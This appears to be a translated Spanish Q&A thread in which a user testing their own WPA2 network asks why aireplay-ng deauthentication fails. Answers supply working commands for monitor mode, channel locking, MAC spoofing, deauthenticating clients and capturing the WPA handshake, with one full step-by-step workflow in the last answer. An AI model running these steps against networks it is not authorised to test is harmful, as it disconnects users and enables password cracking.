Pruebas de penetración de wifi: ¿Por qué no funciona la de-autenticación de aireplay-ng?

9

Estoy intentando limitar la seguridad de la contraseña de mi red inalámbrica. Es un WPA2 con claves previamente compartidas. Mi computadora actual está conectada al enrutador wifi e intento desactivar mi propia máquina.

Pasos

1) He creado una interfaz de monitoreo:

sudo airmon-ng start wlan0

2) Ahora uso airodump-ng para encontrar el canal y el MAC del punto de acceso:

sudo airodump-ng mon0

3) Mi punto de acceso tiene el canal 10 y el MAC ACCESS_POINT_MAC . Puedo grabar paquetes ahora:

sudo airodump-ng -c 10 --bssid ACCESS_POINT_MAC mon0

4) Intento deautenticar mi computadora de la red con aireplay-ng , pero no funciona:

sudo aireplay-ng -0 1 -a ACCESS_POINT_MAC mon0

13:50:47  Waiting for beacon frame (BSSID: ACCESS_POINT_MAC) on channel -1
13:50:47  Couldn't determine current channel for mon0, you should either force the operation with --ignore-negative-one or apply a kernel patch
Please specify an ESSID (-e).
  • ¿Lo que no funciona con la des-autenticación con aireplay-ng?

Actualizar después de los comentarios de @BadSkillz

Agregué --ig y -e ssid_string a mi comando. Sin embargo, no pudo encontrar el BSSID:

14:11:56 Waiting for beacon frame (BSSID: MAC_ADDRESS) on channel -1       
14:12:06 No such BSSID available. 

Al mismo tiempo, puedo encontrar MAC_ADDRESS | BSSID con airodump-ng . Además, Intenté usar otra interfaz al especificar el canal:

sudo airmon-ng start wlan0 10 

dando como resultado mon1 . Sin embargo, el aireplay-ng todavía no mira un canal específico.

    
pregunta Jon 07.11.2014 - 13:53
fuente

8 respuestas

9

Tuve el mismo problema y después de algunas investigaciones, encontré que todo funcionaba bien cuando deshabilité la interfaz wlan0 antes de ejecutar el ataque.

Para deshabilitar la interfaz wlan0 , usé el siguiente comando:

ifconfig wlan0 down

Luego volví a intentar el siguiente comando:

aireplay-ng --deauth 1111 -a macadress-of-ap -c macadress-of-client mon0
    
respondido por el dantosso 11.01.2015 - 23:16
fuente
3

Está mirando el canal -1, intente ejecutar aircrack con la siguiente opción: --ignore-negative-one o --ig como se dijo en el error que publicó:

  

13:50:47 Esperando la trama de baliza (BSSID: ACCESS_POINT_MAC) en el canal -1

     

13:50:47 No se pudo determinar el canal actual para mon0, debe forzar la operación con --ignore-negative-one o aplicar un parche de kernel

    
respondido por el BadSkillz 07.11.2014 - 14:07
fuente
1

En mi experiencia, el problema anterior se produce cuando se transmiten los paquetes deauth con MAC de su máquina atacante y no con MAC de su enrutador.

Entonces, para resolverlo, debes cambiar la dirección MAC de la interfaz WiFi del atacante a la misma que la del enrutador MAC . (Esto es así porque no puede cambiar el MAC de mon0 después de que se haya creado).
Así que haz esto:

  • Deshabilitar mon0 .
  • Apague la interfaz inalámbrica ifconfig wlan0 down (o como se llame a su interfaz).
  • Establezca el MAC del atacante en sus enrutadores: ifconfig wlan0 hw ether TARGET_MAC .
  • Reactiva la interfaz, crea un nuevo mon0 y realiza tu ataque de belleza. Debería funcionar ahora. (También asegúrese de volver a reproducir el paquete deauth 3-4 veces, ya que por alguna razón, a veces, una sola muerte no funciona).

Espero que esto ayude.

    
respondido por el Wolfer 07.11.2014 - 20:45
fuente
1

Tuve un problema similar con un RTL8812AU en Kali 2018. Lo que lo arregló para mí fue lanzar una -D en la línea de comando de ataque, así que deja de intentar determinar automáticamente el canal y simplemente hace lo que le dices.

    
respondido por el Nicodemus 18.06.2018 - 06:09
fuente
0

Este es un problema que existía en versiones anteriores de Kali. Para solucionarlo, actualice a un kali más reciente o use el interruptor --ignore-negative-one . También se ha encontrado útil eliminar algunos servicios problemáticos con airmon-ng check kill .

Incluso para las versiones más nuevas, debe bloquear su tarjeta en el canal deseado. Entonces sudo airmon-ng stop monX y luego sudo airmon-ng start wlanX YY donde X es el número de su interfaz y YY el número del canal deseado.

    
respondido por el dr.doom 10.04.2017 - 02:12
fuente
0

Desactiva el primer wlan0 usando

ifconfig wlan0mon down
Luego ejecuta
iwconfig wlan0mon channel X
donde X es el canal de AP que quieres atacar. Luego simplemente inicie la interfaz nuevamente con
ifconfig wlan0mon up.
Esto funciono para mi     
respondido por el Tryna Learn Somethin 02.01.2018 - 20:24
fuente
-1

Intenta detener Networkmanager:

/etc/init.d/network-manager stop
    
respondido por el hmh 18.03.2015 - 02:03
fuente
-1

Suponiendo que su tarjeta inalámbrica puede hacer la inyección de paquetes (verifique esto con aireplay-ng -9 <interface> ) y asegúrese de que al menos un cliente esté conectado con AP. Para evitar cualquier problema durante el pentest: airmon-ng check kill

Luego ejecute el comando: airmon-ng start wlan0 <channel> (puedes encontrar el canal AP por airodump-ng wlan0 ) Al hacer esto, aireplay-ng probará el único canal especificado.

Ahora emita el siguiente conjunto de comandos paso a paso.

  1. airodump-ng -c <channel> --bssid <BSSID OF AP> -w <directory_to_store_.cap file> <interface> . Ahora los cuatro archivos deberían aparecer en su directorio.

  2. Mantenga este terminal en funcionamiento y observe el MAC del cliente.

  3. Ahora para autenticar al cliente:

    airelplay-ng -0 2 -a <AP MAC> -c <client's mac> <inteface>

Ahora debería poder autenticar al cliente y obtener el handhake WPA en su pantalla de terminal anterior.

Si esto no ayuda, intente airmon-ng stop <interface> y luego service network-manager start . Luego repite todos los pasos nuevamente.

P.S En mi respuesta completa, utilicé la palabra 'interfaz' para la 'interfaz en la que la tarjeta inalámbrica está monitoreando'.

    
respondido por el daya 02.01.2018 - 17:36
fuente

Lea otras preguntas en las etiquetas